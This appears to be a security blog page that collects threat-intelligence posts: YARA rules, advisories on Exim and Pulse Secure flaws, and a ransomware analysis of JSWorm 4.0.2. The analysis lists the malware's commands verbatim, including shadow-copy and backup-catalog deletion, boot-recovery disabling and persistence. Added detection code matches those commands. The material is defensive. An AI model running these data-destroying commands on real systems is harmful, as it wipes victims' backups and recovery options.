Yara Rules

import "pe"

rule TrickBot_Dropper_August_2019 {
    meta:
        description = "Yara rule for TrickBot dropper - August variant"
        author = "Yoroi - ZLab"
        last_updated = "2019-09-09"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = {0E E3 4E B0 36 C5 A5 32 62 37 C3 1E 86 F3 44 2B}
        $a2 = {E8 E3 9E 31 3D 37 78 12 89 07 DB 71 B2 92 2E B8}
        $b1 = /\([^,]*,'Ch'\)/
    condition:
        all of ($a*) or $b1
}

rule TrickBot_August_2019 {
    meta:
        description = "Yara rule for TrickBot - August variant"
        author = "Yoroi - ZLab"
        last_updated = "2019-09-09"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = "VIEW 4 ME UK LIMITED1" wide ascii
        $a2 = "mfAACEnc.dll" wide ascii
    condition:
        all of them and pe.number_of_resources == 7
}

This article was authored by Antonio Farina, Davide Testa and Antonio Pirozzi  of Cybaze-Yoroi Z-LAB.

Flaw in the Exim Mail Server

Proto: N030919.

Yoroi hereby wishes to inform you of the discovery of a critical vulnerability in Exim, the open-source mail server used by companies, service providers and technology vendors. The issue is tracked as CVE-2019-15846.

The problem is caused by flaws in the handling of the trailing characters of the Server Name Indication (SNI) while the TLS-encrypted channel is being set up (SMTP over TLS), through which a remote attacker can execute arbitrary code with root privileges on the target server.

The maintainers have published a security bulletin confirming that all Exim versions up to and including 4.92.1 are affected, have released version 4.92.2, which fixes the issue, and have provided the following ACL deny rules, which block the attack vectors known so far (both check whether the last character of the client-supplied SNI or peer DN is a backslash):

deny    condition = ${if eq{\\}{${substr{-1}{1}{$tls_in_sni}}}}
deny    condition = ${if eq{\\}{${substr{-1}{1}{$tls_in_peerdn}}}}

The maintainers also specify that the problem does not originate in the cryptographic libraries used by the mail server, but in Exim's own application logic.

Given the potential Internet exposure of the affected systems and the availability of technical details about the issue, Yoroi strongly recommends planning the installation of the available updates and applying the mitigations suggested by the maintainers.

Finally, Yoroi recommends keeping user awareness high, periodically warning users about ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

Wave of Attacks Against Italian Companies (Ursnif)

Proto: N020919.

Yoroi hereby wishes to inform you of the detection of a dangerous attack campaign under way against Italian users and companies. The e-mails sent by the cyber criminals refer to supposed documents and fictitious invoices, and invite the victim to open an Excel spreadsheet able to infect the machine with a malware implant of the Ursnif family (TH-124), a threat capable of intercepting keystrokes, stealing saved passwords and tampering with the user's web browsing.

Figure. Example of the malicious document

The indicators of compromise extracted during the analysis are reported below:

Finally, Yoroi recommends keeping user awareness high, periodically warning users about ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

JSWorm: The 4th Version of the Infamous Ransomware

Introduction

Ransomware attacks show no sign of ending. These cyber weapons are backed by dedicated staff who constantly update and improve the malware to make detection and decryption harder. Like the popular GandCrab, which reached version 5 before its shutdown, other ransomware families are continuously maintained with the purpose of generating revenue for cyber criminals. One of them is JSWorm, which has been updated to version 4.

Although the name may suggest the JavaScript language and some worm-like propagation logic, the malware has neither characteristic.

Technical Analysis

Hash (SHA256): 46761b8b727f3002d1c73fa6c8568ebcf2ec0066666251f66dcda9d4268e03e8
Threat: JSWorm
Brief Description: JSWorm 4.0.2
Ssdeep: 3072:77LlFWt1yDzVwq4wk+KdXqSmT9C8Fi7FvSJv+R1Y:77a2XC9+KBJmT9BihSlw+

Table 1: Information about JSWorm 4.0.2 version

JSWorm encrypts all the user files and appends a new extension to their names. Unlike other ransomware, the extension is composed of several fields carrying the information the victim needs to proceed to the ransom-payment phase; these are the same fields shown in the ransom note: "Filename.originalExtension.[Infection_ID][Attacker_email].JSWRM"

Figure 1: Infection ID and Contact E-mail 

Moreover, the ransom note also lists a backup e-mail address, “[email protected]”, to ensure reachability in case the primary one is blacklisted. During the encryption phase, the ransomware creates an HTML Application named “JSWRM-DECRYPT.hta” in each folder it traverses. The HTA file is the ransom window shown in Figure 1.

To keep the machine usable, the ransomware excludes several system directories (Windows, PerfLogs) and junction points such as Documents and Settings, $RECYCLE.BIN, System Volume Information and MSOCache from the encryption phase. For each file encountered, the malware compares its path against the excluded ones and, on a match, takes a conditional jump that skips the file.

Figure 2: Excluded paths

Unlike most ransomware, JSWorm does not embed a list of file extensions to encrypt but a list of extensions to skip during the cipher step: every file whose extension is not in the list is encrypted.

Figure 3: Extensions excluded from encryption

During the encryption phase, JSWorm writes a file named “key.Infection_ID.JSWRM” to “C:\ProgramData”. It contains the AES key used to encrypt the files; unfortunately, the key is itself encrypted with RSA before being stored, so it cannot be used directly for recovery. The following figure shows an example of the encrypted key.

Figure 4: Content of the “key” file contained in “C:\ProgramData”

Moreover, to maximize the impact of the encryption phase, the ransomware deletes the Volume Shadow Copies (twice, via vssadmin and wmic) and the backup catalog, disables the Windows recovery options at boot, registers a Run key named “zapiska” that reopens the ransom note at every logon, and kills the Exchange, SQL Server and DNS server processes, which typically hold database and mailbox files open.

The commands invoked by JSWorm to perform these actions are:

Command | Purpose
vssadmin.exe delete shadows /all /quiet | Delete the Volume Shadow Copies
bcdedit /set {default} bootstatuspolicy ignoreallfailures -y | Disable Windows Error Recovery on startup
bcdedit /set {default} recoveryenabled No -y | Disable Automatic Startup Repair
wbadmin delete catalog -quiet | Delete the backup catalog
wmic shadowcopy delete -y | Second attempt to delete the Volume Shadow Copies
/c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "zapiska" /d "C:\ProgramData\JSWRM-DECRYPT.txt" -y | Set persistence at startup (Run key)
/c taskkill.exe taskkill /f /im store.exe | Kill the “store.exe” process (Microsoft Exchange Information Store)
/c taskkill.exe taskkill /f /im sqlserver.exe | Kill the “sqlserver.exe” process
/c taskkill.exe taskkill /f /im dns.exe | Kill the “dns.exe” process
/c taskkill.exe taskkill /f /im sqlwriter.exe | Kill the “sqlwriter.exe” process

Table 2: Commands executed by the malware

An example of how the malware invokes these commands through the “ShellExecuteA” API is shown in the following figure.

Figure 5: Disassembled routine for deleting the shadow copies
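Every command in Table 2 is spawned as a separate child process, so process-creation telemetry (Sysmon Event ID 1 or an EDR equivalent) is where these preparatory steps surface. The Python below is an added detection example, not part of the original analysis: it matches command lines against the behaviours in the table, counts each technique once per host and raises an alert when the accumulated weight crosses a threshold. The weights, the threshold, the pipe-separated event format and the sample events (including the “jsworm.exe” parent name) are assumptions constructed for the example; the benign “vssadmin list shadows” line shows why the rules key on the delete verb rather than on the tool name.

```python
import re
from collections import defaultdict

# One rule per behaviour in Table 2: (name, pattern over the lower-cased
# command line, weight). Weights are an assumption for this example and should
# be tuned locally; they rank destructive, ransomware-specific actions highest.
RULES = [
    ("shadow_copy_delete_vssadmin", re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b"), 5),
    ("shadow_copy_delete_wmic", re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\s+delete\b"), 5),
    ("backup_catalog_delete", re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete\s+catalog\b"), 5),
    ("boot_recovery_disabled", re.compile(
        r"\bbcdedit(\.exe)?\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b"), 4),
    ("kill_server_process", re.compile(
        r"\btaskkill(\.exe)?\b.*/im\s+(store|sqlserver|dns|sqlwriter)\.exe\b"), 3),
    ("run_key_persistence", re.compile(r"\breg(\.exe)?\s+add\b.*\\currentversion\\run\b"), 2),
]
WEIGHTS = {name: weight for name, _, weight in RULES}
ALERT_THRESHOLD = 8  # assumption: one shadow-copy wipe plus any second technique


def classify(cmdline):
    """Names of the rules matched by a single command line."""
    low = cmdline.lower()
    return [name for name, pattern, _ in RULES if pattern.search(low)]


def score_events(events):
    """Aggregate matches per host.

    Each event is "host|parent_image|command_line" (format assumed for the
    example; map your Sysmon/EDR fields accordingly). A technique is counted
    once per host so that a loop re-running vssadmin does not inflate the score.
    """
    per_host = defaultdict(lambda: {"score": 0, "techniques": set(), "hits": []})
    for line in events:
        host, parent, cmdline = line.split("|", 2)
        for name in classify(cmdline):
            entry = per_host[host]
            if name not in entry["techniques"]:
                entry["techniques"].add(name)
                entry["score"] += WEIGHTS[name]
            entry["hits"].append((name, parent, cmdline))
    return dict(per_host)


def alerting_hosts(events, threshold=ALERT_THRESHOLD):
    """Hosts whose accumulated score reaches the alert threshold."""
    return sorted(host for host, data in score_events(events).items()
                  if data["score"] >= threshold)


# Constructed sample telemetry (not real logs; "jsworm.exe" is a placeholder
# parent name). The WS-042 lines replay the sequence from Table 2; the last
# two lines are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    r"WS-042|C:\Users\bob\AppData\Local\Temp\jsworm.exe|vssadmin.exe delete shadows /all /quiet",
    r"WS-042|C:\Users\bob\AppData\Local\Temp\jsworm.exe|bcdedit /set {default} bootstatuspolicy ignoreallfailures -y",
    r"WS-042|C:\Users\bob\AppData\Local\Temp\jsworm.exe|bcdedit /set {default} recoveryenabled No -y",
    r"WS-042|C:\Users\bob\AppData\Local\Temp\jsworm.exe|wbadmin delete catalog -quiet",
    r"WS-042|C:\Users\bob\AppData\Local\Temp\jsworm.exe|wmic shadowcopy delete -y",
    r'WS-042|C:\Windows\System32\cmd.exe|/c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "zapiska" /d "C:\ProgramData\JSWRM-DECRYPT.txt" -y',
    r"WS-042|C:\Windows\System32\cmd.exe|/c taskkill.exe taskkill /f /im store.exe",
    r"WS-042|C:\Windows\System32\cmd.exe|/c taskkill.exe taskkill /f /im sqlwriter.exe",
    r"SRV-BACKUP|C:\Program Files\BackupAgent\agent.exe|vssadmin.exe list shadows",
    r"SRV-FILE|C:\Windows\System32\cmd.exe|/c taskkill /f /im notepad.exe",
]

if __name__ == "__main__":
    for host, data in score_events(SAMPLE_EVENTS).items():
        print(f"{host}: score {data['score']}, techniques {sorted(data['techniques'])}")
    print("alert:", alerting_hosts(SAMPLE_EVENTS))
```

Scoring per host rather than per event matters here: a single shadow-copy deletion is also what backup software and administrators do, while the combination of shadow-copy wiping, recovery disabling and service killing within the same host is the ransomware pattern worth paging on.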

The Encryption Scheme

The AES key that the malware later encrypts is derived from an embedded Base64 seed, “MI2i6BWRFhcswznItBEl33UaIoDOwqI=”, which is decoded into a byte array through the CryptStringToBinaryA API before further low-level manipulation.

Figure 6: Embedded initial string used to generate AES key

The fixed string is combined with a random component so that the derived AES key differs for every infection. Not even the malware author knows the final AES key, so a victim who wants to recover their files must send the key file stored in “C:\ProgramData”; on the other side, the attacker decrypts its content with the RSA private key and extracts the AES key needed to decrypt the victim's files.

To encrypt the AES key, JSWorm uses an RSA public key embedded in the binary in Base64 form, as shown in the following figure.

Figure 7: RSA public key blob (“RSA1” magic) in Base64 encoding (left) and in binary form (right)

The control flow used to encrypt the AES key is based on Windows Cryptography API, as visible in the following figure.

Figure 8: Entire control flow to encrypt the AES key

After decoding the RSA public key and initialising a PROV_RSA_FULL cryptographic service provider (CSP) through the “CryptAcquireContextA” function, the ransomware imports the decoded key with the “CryptImportKey” API.

Figure 9: Imported RSA key through “CryptImportKey” API

The last step is the encryption routine, which is done using the “CryptEncrypt” function, as shown in the following figure.

Figure 10: Parameters for the “CryptEncrypt” function
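CryptImportKey expects the RSA public key as a CryptoAPI key blob, and the “RSA1” magic visible in the binary dump of Figure 7 marks a PUBLICKEYBLOB: an 8-byte BLOBHEADER, a 12-byte RSAPUBKEY (magic, bit length, public exponent) and the modulus stored little-endian. The Python below is an added example, not code from the original analysis or from the malware: it decodes such a Base64 blob and recovers bit length, exponent and modulus, rejecting private (“RSA2”), malformed or truncated blobs. The blob it parses is constructed inside the example from an arbitrary 1024-bit number; it is not a real RSA modulus and not the key embedded in JSWorm.

```python
import base64
import struct

# CryptoAPI constants from wincrypt.h
PUBLICKEYBLOB = 0x06
CUR_BLOB_VERSION = 0x02
CALG_RSA_KEYX = 0x0000A400   # RSA key-exchange key, the type usable with CryptEncrypt
CALG_RSA_SIGN = 0x00002400   # RSA signature key
RSA1_MAGIC = 0x31415352      # b"RSA1" read little-endian: public key blob
RSA2_MAGIC = 0x32415352      # b"RSA2": private key blob
HEADER_LEN = 8 + 12          # BLOBHEADER + RSAPUBKEY


def parse_rsa_public_blob(b64):
    """Decode a Base64 CryptoAPI PUBLICKEYBLOB of the kind passed to CryptImportKey.

    Layout: BLOBHEADER {bType, bVersion, reserved, aiKeyAlg}, RSAPUBKEY
    {magic, bitlen, pubexp}, then the modulus as bitlen/8 little-endian bytes.
    """
    blob = base64.b64decode(b64, validate=True)
    if len(blob) < HEADER_LEN:
        raise ValueError("blob too short for BLOBHEADER + RSAPUBKEY")
    btype, bversion, reserved, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, pubexp = struct.unpack_from("<III", blob, 8)
    if magic == RSA2_MAGIC:
        raise ValueError("RSA2 magic: this is a PRIVATEKEYBLOB, not a public key")
    if magic != RSA1_MAGIC or btype != PUBLICKEYBLOB:
        raise ValueError("not an RSA PUBLICKEYBLOB (magic=%#x, bType=%#x)" % (magic, btype))
    if bversion != CUR_BLOB_VERSION or reserved != 0:
        raise ValueError("unexpected BLOBHEADER version/reserved fields")
    if alg not in (CALG_RSA_KEYX, CALG_RSA_SIGN) or bitlen % 8:
        raise ValueError("unsupported aiKeyAlg %#x or bit length %d" % (alg, bitlen))
    mod_len = bitlen // 8
    if len(blob) < HEADER_LEN + mod_len:
        raise ValueError("truncated modulus: need %d bytes, have %d"
                         % (mod_len, len(blob) - HEADER_LEN))
    # CryptoAPI stores the modulus little-endian; int.from_bytes turns it into
    # the conventional big-endian number you would feed to other tools.
    modulus = int.from_bytes(blob[HEADER_LEN:HEADER_LEN + mod_len], "little")
    return {
        "alg": "CALG_RSA_KEYX" if alg == CALG_RSA_KEYX else "CALG_RSA_SIGN",
        "bits": bitlen,
        "exponent": pubexp,
        "modulus": modulus,
        "modulus_hex": "%0*x" % (mod_len * 2, modulus),
        "trailing_bytes": len(blob) - HEADER_LEN - mod_len,
    }


def build_public_blob(modulus, exponent=65537):
    """Serialise modulus/exponent into the same PUBLICKEYBLOB layout.

    Used here only to construct a sample to parse; CryptExportKey emits this format.
    """
    bitlen = (modulus.bit_length() + 7) // 8 * 8
    header = struct.pack("<BBHI", PUBLICKEYBLOB, CUR_BLOB_VERSION, 0, CALG_RSA_KEYX)
    rsapub = struct.pack("<III", RSA1_MAGIC, bitlen, exponent)
    body = header + rsapub + modulus.to_bytes(bitlen // 8, "little")
    return base64.b64encode(body).decode("ascii")


# Constructed sample: an arbitrary 1024-bit odd number standing in for a
# modulus. It is NOT a real RSA key and NOT the key embedded in JSWorm.
SAMPLE_MODULUS = (1 << 1023) | (0xC0FFEE << 400) | 0x10001
SAMPLE_BLOB_B64 = build_public_blob(SAMPLE_MODULUS)

if __name__ == "__main__":
    key = parse_rsa_public_blob(SAMPLE_BLOB_B64)
    print(f"RSA-{key['bits']} {key['alg']} e={key['exponent']} trailing_bytes={key['trailing_bytes']}")
    print("n =", key["modulus_hex"][:32], "...")
```

Checking the bit length and the exponent is the first thing to do with a recovered blob: a short modulus or an unusual exponent would be the only realistic hope for a decryptor, while a correctly used 2048-bit key with e=65537 confirms that the per-infection AES key cannot be recovered without the attacker's private key.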

A curious detail of the malware code is the Russian string used to create the mutex, “kto prochtet tot sdohnet =)”, which means “whoever reads this will die =)”.

Figure 11: Mutex creation

Conclusion

The analyzed sample shares features with most ransomware: the hybrid encryption scheme, the deletion of shadow copies and persistence. As for the encryption scheme, the ransomware derives an AES key from an embedded Base64 seed decoded through the CryptStringToBinaryA API. It is very common to find ransomware relying on this library (CryptoAPI) for cryptographic tasks, mainly for reliability and to reduce development time.

Another interesting element is the mutex string “kto prochtet tot sdohnet =)”, written in transliterated Russian. This suggests that Russian-speaking authors could be behind the malware. Obviously this could also be a false flag, but the Russian-speaking underground has a long tradition in this kind of cyber-crime activity: according to research by Anton Ivanov, senior malware analyst at Kaspersky Lab, back in 2016 about 75% of the new crypto-ransomware tracked that year originated from the Russian underground, evidence of a consolidated malware-writing capability.

Indicators of Compromise

Yara Rule

// Rule identifiers cannot contain dots in YARA, so version 4.0.2 is written 4_0_2.
rule JSWorm_4_0_2_July_2019 {
    meta:
        description = "Yara rule for JSWorm 4.0.2"
        author = "Yoroi - ZLab"
        last_updated = "2019-08-27"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = "Total size of files must be less than 5MB"
        $a2 = "BORw0KGgoAAAANSU"
        $a3 = {FA 39 2E 3A 3A 3A 41 3A 68}
        $a4 = {19 38 12 39 2E 39 26 3A}
        $a5 = {32 DC 32 F0 32 0C 33}
        $a6 = "vssadmin.exe"
        $a7 = "wmic shadowcopy"
        $a8 = "MI2i6BWRFhcs"
        $a9 = {4D CC 2B C1 83 F8}
        $a10 = {FF 83 C8 FF 5D C3 8B 40}
    condition:
        4 of ($a*)
}

This blog post was authored by Antonio Farina, Davide Testa and Antonio Pirozzi.

Vulnerabilities in Pulse Secure Appliances

Proto: N010919.

Yoroi hereby wishes to inform you of the detection of serious vulnerabilities in Pulse Secure technologies, security appliances widely used in enterprise environments as VPN gateways. The main issues are tracked as CVE-2019-11510, CVE-2019-11539 and CVE-2019-11542.

Due to several flaws in the handling of user input, an unauthenticated network attacker can download arbitrary files and configuration data from the targeted Pulse Secure appliance. Following exploitation, the remote attacker may be able to recover the credentials needed to exploit further vulnerabilities in the diagnostics module and in various other internal modules, which allow arbitrary code execution on the system.

The vendor has confirmed the issues in security bulletin SA44101, releasing updates for the following versions:

Given the potential Internet exposure of vulnerable appliances and the recent release of technical details and Proof-of-Concept code able to reproduce the vulnerabilities, Yoroi recommends verifying the patch level of any Internet-exposed Pulse devices and applying the security patches made available by the vendor.

Finally, Yoroi recommends keeping user awareness high, periodically warning users about ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index